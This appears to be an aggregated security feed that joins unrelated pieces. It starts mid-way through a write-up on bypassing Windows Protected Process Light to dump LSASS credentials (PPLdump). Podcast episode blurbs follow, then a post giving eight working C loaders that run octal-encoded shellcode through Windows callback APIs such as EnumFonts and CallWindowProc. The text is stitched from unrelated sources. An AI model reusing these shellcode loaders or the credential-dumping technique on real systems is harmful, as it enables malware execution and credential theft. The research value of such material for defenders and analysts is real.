We want to execute arbitrary code inside a PPL, and ideally with the signer type “WinTcb”. So, we need to find a suitable executable candidate first. On Windows 10, four built-in binaries can be executed with such a level of protection as far as I know: wininit.exe, services.exe, smss.exe and csrss.exe. smss.exe and csrss.exe cannot be executed in Win32 mode so we can eliminate them. I did a few tests with wininit.exe but letting this binary run as an administrator with debug privileges is a bad idea. Indeed, there is a high chance it will mark itself as a Critical Process, meaning that when it terminates, the system will likely crash with a BSOD.

This leaves us with only one potential candidate: services.exe. As it turns out, this is the perfect candidate for our purpose. Its main function is very easy to decompile and understand. Here is the corresponding pseudo-code.

int wmain()
{
    HANDLE hEvent;
    hEvent = OpenEvent(SYNCHRONIZE, FALSE, L"Global\\SC_AutoStartComplete");
    if (hEvent) {
        CloseHandle(hEvent);
    } else {
        RtlSetProcessIsCritical(TRUE, NULL, FALSE);
        if (NT_SUCCESS(RtlInitializeCriticalSection(&CriticalSection))
            SvcctrlMain();
    }
    return 0;
}

It first tries to open a global Event object. If it worked, the handle is closed, and the process terminates. The actual main function SvcctrlMain() is executed only if this Event object does not exist. This makes sense, this simple synchronization mechanism makes sure services.exe is not executed twice, which is perfect for our use case as we don’t want to mess with the Service Control Manager (services.exe is the image file used by the SCM).

WinObj – SC_AutoStartComplete global Event

Now, in order to get a first glimpse at the DLLs that are loaded by services.exe, we can use Process Monitor with a few filters.

Process Monitor – DLLs loaded by services.exe

From this output, we know that services.exe loads three DLLs (which are not Known DLLs) but this information, on its own, is not sufficient. We need to also find which functions are imported. So, we need to take a look at the PE’s import table.

IDA – Import table of services.exe

Here, we can see that only one function is imported from dpapi.dll: CryptResetMachineCredentials. Therefore, this is the simplest DLL to hijack. We just have to remember that we will have to export this function, otherwise our crafted DLL will not be loaded.

But is it that simple? The short answer is “no”. After doing some testing on various installations of Windows, I realized that this behavior was not consistent. On some versions of Windows 10, dpapi.dll is not loaded at all, for some reason. In addition, the DLLs that are imported by services.exe on Windows 8.1 are completely different. In the end, I had to take all these differences into account in order to build a tool that works on all the recent versions of Windows (including the Server editions) but you get the overall idea.

DLL File Mapping

In the previous parts, we saw how we could trick the CSRSS service into creating an arbitrary symbolic link object in \KnownDlls but I intentionally omitted an essential part: the target path of the link.

A symbolic link can virtually point to any kind of object in the object manager but, in our case, we have to mimic the behavior of a library being loaded as a Known DLL. This means that the target must be a Section object, rather than the DLL file path for example.

As we saw earlier, “Known DLLs” are Section objects which are stored in the object directory \KnownDlls and this is also the first location in the DLL search order. So, if a program loads a DLL named FOO.dll and the Section object \KnownDlls\FOO.dll exists, then the loader will use this image rather than mapping the file again. In our case, we have to do this step manually. The term “manually” is a bit inappropriate though as we do not really have to map the file ourselves if we do this in the “legitimate way”.

A Section object can be created by invoking NtCreateSection. This native API function requires an AllocationAttributes argument, which is usually set to SEC_COMMIT or SEC_IMAGE. When SEC_IMAGE is set, we can specify that we want to map a previously opened file as an executable image file. Therefore, it will be properly and automatically mapped into memory. But this means that we have to embed a DLL, write it to the disk, open it with CreateFile to get a handle on the file and finally invoke NtCreateSection. For a Proof-of-Concept, this is fine, but I wanted to go the extra mile and find a more elegant solution.

Another approach would consist in doing everything in memory. Similarly to the famous Process Hollowing technique, we would have to create a Section object with enough memory space to store the content of our DLL’s image, then parse the NT headers to identify each section inside the PE and map them appropriately, which is what the loader does. This a rather tedious process and I did not want to go this far. Though, while doing my research, I stumbled upon a very interesting blog post about “DLL Hollowing” by @_ForrestOrr. In his Proof-of-Concept he made use of Transactional NTFS (a.k.a TxF) to replace the content of an existing DLL file with his own payload without really modifying it on disk. The only requirement is that you must have write permissions on the target file.

In our case, we assume that we have admin privileges, so this is perfect. We can open a DLL in the System directory as a transaction, replace its content with our payload DLL and finally use the opened handle in the NtCreateSection API function call with the flag SEC_IMAGE. But I did say that we still need to have write permissions on the target file, even though we don’t really modify the file itself. This is a problem because system files are owned by TrustedInstaller, aren’t they? Since we assume we have admin privileges, we could well elevate to TrustedInstaller but there is a simpler solution. It turns out some (DLL) files within C:\Windows\System32\ are actually owned by SYSTEM, so we just have to search this directory for a proper candidate. We should also make sure that its size is large enough so that we can replace its content with our own payload.

Exploiting as SYSTEM?

In the exploit part, I insisted on the fact that the DefineDosDevice API function must be called as any user other than SYSTEM, otherwise the whole “trick” would not work. But what if we are already SYSTEM and we don’t have an administrator account. We could create a temporary local administrator account, but this would be quite lame. A better thing to do is simply impersonate an existing user. For instance, we can impersonate LOCAL SERVICE or NETWORK SERVICE, as they both have their own DOS device directory.

Assuming we have “debug” and “impersonate” privileges, we can list the current processes, find one that runs as LOCAL SERVICE, duplicate the primary token and temporarily impersonate this user. It’s as simple as that.

No matter if we are executing the exploit as SYSTEM or as an administrator, in both cases, we will have to go back and forth between two identities without losing track of things.

Conclusion

In this post, we saw how a seemingly benign API function could be leveraged by an administrator to eventually inject arbitrary code into a PPL with the highest level using some very clever tricks. I implemented this technique in a new tool – PPLdump – in reference to ProcDump. Assuming you have administrator or SYSTEM privileges, it allows you to dump the memory of any PPL, including LSASS when LSA Protection is enabled.

This “vulnerability”, initially published in 2018, is still not patched. If you wonder why, you can check out the Windows Security Servicing Criteria section in the Microsoft Bug Bounty program. You will see that even a non-admin to PPL bypass is not a serviceable issue.

Windows Security Servicing Criteria

By implementing this technique in a standalone tool, I learned a lot about some Windows Internals which I did not really have the opportunity to tackle before. In return, I covered a lot of those aspects in this blog post. But this would have certainly not been possible if great security researchers such as James Forshaw (@tiraniddo) did not share their knowledge through their various publications. So, once again, I want to say a big thank you to him.

If you want to read the original publication or if you want to learn more about “DLL Hollowing“, you can check out the following resources.

  • @tiraniddo – Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege – link
  • @_ForrestOrr – Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing – link

Supply-chain security and servant leadership | Guest Manish Gupta

In this episode we explore supply-chain security with Manish Gupta. We’re going to learn about risks and cyberattacks related to the continuous integration/continuous deployment or CI/CD pipeline, which, given high-profile attacks like SolarWinds, will give us plenty to discuss this week!

0:00 - Intro
2:21 - Manish's origin story
4:58 - Major career stepping stones
8:45 - Lessons when ahead of the curve
11:21 - Average day as a servant leader CEO
14:54 - Concerns with supply chain security
21:22 - Federal supply chain action
26:20 - What supply chain policy should focus on
28:40 - Skills needed for supply chain jobs
32:48 - What should be on my resume?
34:03 - Showing supply chain aptitude
36:04 - Future projects
38:29 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Manish Gupta is the founder and CEO of ShiftLeft, an innovator in automated application security and the leader in application security for developers. He previously served as the chief product and strategy officer at FireEye, where he helped grow the company from approximately $70 million to more than $700 million in revenue, growing the product portfolio from two to more than 20 products. Before that he was vice president of product management for Cisco’s $2 billion security portfolio. He also served as a  vice president/general manager at McAfee and iPolicy networks.

Manish has an MBA from the Kellogg Graduate School of Management, MS in engineering from the University of Maryland and a BS in engineering from the Delhi College of Engineering.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

What does a digital forensic investigator do in the government? | Guest Ondrej Krehel

Digital forensics professional Ondrej Krehel talks about the work of digital forensics in federal and government locations, the things he learned during a months-long attempt at decrypting a well-secured Swiss bank file and why finishing the research beats any degree you could ever have.

0:00 - Intro
2:11 - Ondrej's cybersecurity journal
5:33 - Career stepping stones
9:55 - The Swiss job
16:02 - Chasing the learning and experience
20:01 - Digital forensics on a government and federal scale
28:07 - Forensics collaboration on a case
30:46 - Favorite work stories
31:33 - How to improve infrastructure security
36:01 - Skills needed to enter digital forensics in government
41:31 - Unheard activities of digital forensics
43:48 - Where do I get work experience?
47:05 - Tips for digital forensic job hunters
52:19 - Work with LIFARS
57:50 - Outro

Have you seen our new, hands-on training series Cyber Work Applied? Tune in every other week as expert Infosec instructors teach you a new cybersecurity skill and show you how that skill applies to real-world scenarios. You’ll learn how to carry out different cyberattacks, practice using common cybersecurity tools, follow along with walkthroughs of how major breaches occurred, and more. And it's free!

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Ondrej Krehel is a Digital forensics and cybersecurity professional. His background includes time with special cyber operations, cyber warfare and offensive missions and a court expert witness. His Forensic Investigation matters have received attention from Forbes, CNN, NBC, BBC, ABC, Reuters, The Wall Street Journal and The New York Times.

As you can see, Ondrej has a deep background in digital forensics and ethical hacking. He tells us about time spent as a guest lecturer at the FBI Training Academy, the current state of digital forensics in a federal and government context and gives us some info about how that realm differs from similar work done in for-profit or private companies.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Your beginner cybersecurity career questions, answered! | Cyber Work Live

Whether you’re looking for first-time work in the cybersecurity field, still studying the basics or considering a career change, you might feel overwhelmed with choices. How do you know you have the right knowledge? How do you make yourself stand out in the resume pile? How do you get jobs that require experience without having any experience?

Join a panel of past Cyber Work Podcast guests including Gene Yoo, CEO of Resecurity, and the expert brought in by Sony to triage the 2014 hack; Mari Galloway, co-founder of Women’s Society of Cyberjutsu and Victor “Vic” Malloy, General Manager, CyberTexas.

They provide top-notch cybersecurity career advice for novices, including questions from Cyber Work Live viewers.

0:00 - Intro
3:38 - I'm tech-savvy. Where do I begin?
10:55 - Figuring out the field for you
19:16 - Returning to cybersecurity at 68
23:30 - Finding a cybersecurity mentor
29:39 - Non-technical roles in the industry
36:21 - Breaking into the industry
43:46 - Standout resume and interview
51:31 - Is a certification necessary?
56:50 - Related skills beginners should have
1:04:35 - Outro

This episode was recorded live on March 25, 2021. Want to join the next Cyber Work Live and get your career questions answered? See upcoming events here: https://www.infosecinstitute.com/events/

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Executing Shellcode via Callbacks

What is a Callback Function?

In simple terms, it’s a function that is called through a function pointer. When we pass a function pointer to the parameter where the callback function is required, once that function pointer is used to call that function it points to it’s said that a call back is made. This can be abused to pass shellcode instead of a function pointer. This has been around a long time and there are so many Win32 APIs we can use to execute shellcode. This article contains few APIs that I have tested and are working on Windows 10.

Analyzing an API

For example, let’s take the function EnumWindows from user32.dll. The first parameter lpEnumFunc is a pointer to a callback function of type WNDENUMPROC.

BOOL EnumWindows(
  WNDENUMPROC lpEnumFunc,
  LPARAM      lParam
);

The function passes the parameters to an internal function called EnumWindowsWorker.

The first parameter which is the callback function pointer is called inside this function making it possible to pass position independent shellcode.



By checking the references, we can see that other APIs use EnumWindowsWorker function making them suitable candidates for executing shellcode.

EnumFonts

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumFonts(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode, 0);
}

EnumFontFamilies

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumFontFamilies(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode,0);
}

EnumFontFamiliesEx

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumFontFamiliesEx(GetDC(0), 0, (FONTENUMPROC)(char *)shellcode, 0, 0);
}

EnumDisplayMonitors

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumDisplayMonitors((HDC)0,(LPCRECT)0,(MONITORENUMPROC)(char *)shellcode,(LPARAM)0);
}

LineDDA

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	LineDDA(10, 11, 12, 14, (LINEDDAPROC)(char *)shellcode, 0);
}

GrayString

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	GrayString(0, 0, (GRAYSTRINGPROC)(char *)shellcode, 1, 2, 3, 4, 5, 6);
}

CallWindowProc

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	CallWindowProc((WNDPROC)(char *)shellcode, (HWND)0, 0, 0, 0);
}

EnumResourceTypes

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumResourceTypes(0, (ENUMRESTYPEPROC)(char *)shellcode, 0);
}

You can check this repo by my friends @bofheaded & @0xhex21 for other callback APIs.

Defending the grid: From water supply hacks to nation-state attacks | Guest Emily Miller

This episode we welcome back Emily Miller of Mocana to discuss infrastructure security! We discuss the water supply hack in Oldsmar, Fla., the state of the nation’s cybersecurity infrastructure and brainstorm a TikTok musical that will make infrastructure security the next Hamilton! 

0:00 - Intro
3:02 - The last two years
5:54 - The impact of COVID
10:10 - The Florida hack
15:50 - Scope and scale of safety systems
18:50 - State and local government responses
23:20 - Logistical issues of security for infrastructure
26:45 - Ideal solutions to security 
31:33 - How to improve infrastructure security
39:42 - Aiming toward state and local government 
43:20 - Skills to learn for this work
48:13 - Future proofing this role
52:54 - Work and upcoming projects
55:55 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Miller is the Vice President of Critical Infrastructure and National Security with Mocana Corporation. Miller has over 15 years of experience protecting our nation’s critical infrastructure in both physical and cybersecurity, focusing on control systems, industrial IoT and other operational technology. Prior to joining Mocana, Miller was a federal employee with the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT).  

On our previous episode back in early 2019, Miller and I talked about IoT security and infrastructure security, and how strengthening IoT and the security systems of our electrical, water and internet infrastructures isn’t just good business, it’s saving lives.

In the last two years, these issues have become even more noticeable and pronounced. Earlier this year, hackers were able to break into the network of a water purification system in a small town in Florida. By changing cleaning and purification levels in the town’s water supply, they could have realistically poisoned the whole town. Miller and I will be discussing not only how to address the problems we have now, but to help the new generation of cybersecurity professionals lead the charge to reverse a 50+ year trend of neglect against our country’s vital infrastructure, from power grids to roads.

About Infosec

Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

How to become a cybersecurity project manager | Guest Jackie Olshack

This episode we chat with Jackie Olshack, a project management professional, about the role of project management in cybersecurity. We break down the specific functions of some major project management certifications, discuss things you can do tonight to start your project management training and hear why every security breach story on CNN is a cause for reflection.

0:00 - Intro
3:09 - Getting into cybersecurity project management
4:30 - What does a cybersecurity project manager do?
5:56 - Identity access management
8:35 - Average day for a project manager
9:57 - Managing project resources
11:36 - Getting into project management
12:54 - What happens without a project manager?
14:30 - Highs and lows of the job
17:22 - Training needed for the role
20:18 - What is identity access management?
24:12 - Preferred job experiences
28:02 - Interests and skills to succeed
31:17 - Where do I begin with tech lingo?
33:18 - What can I do to change careers?
35:00 - Has remote work changed workflow?
35:55 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Jackie Olshack worked almost 20 years as legal secretary/paralegal for multiple patent corporate law firms. In the late 1990s, she began to recognize it was becoming harder to break the ceiling on her $58,000 salary as more and more attorneys were typing their own documents, managing their own calendars and making their own travel arrangements, putting the future of her career in jeopardy. After some introspection, she decided to go back to college and pursue a science degree with plans to go to law school to become a patent attorney — but couldn’t get her LSAT higher to get into even a fourth-tier law school. She now proudly thanks all the law schools that turned her down, preventing the dreaded $150,000-$200,000 law school debt she would have incurred. She is now an analytical, top performing SAFe trained senior project management professional with 14+ years of experience managing and implementing IT programs and projects successfully.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

❌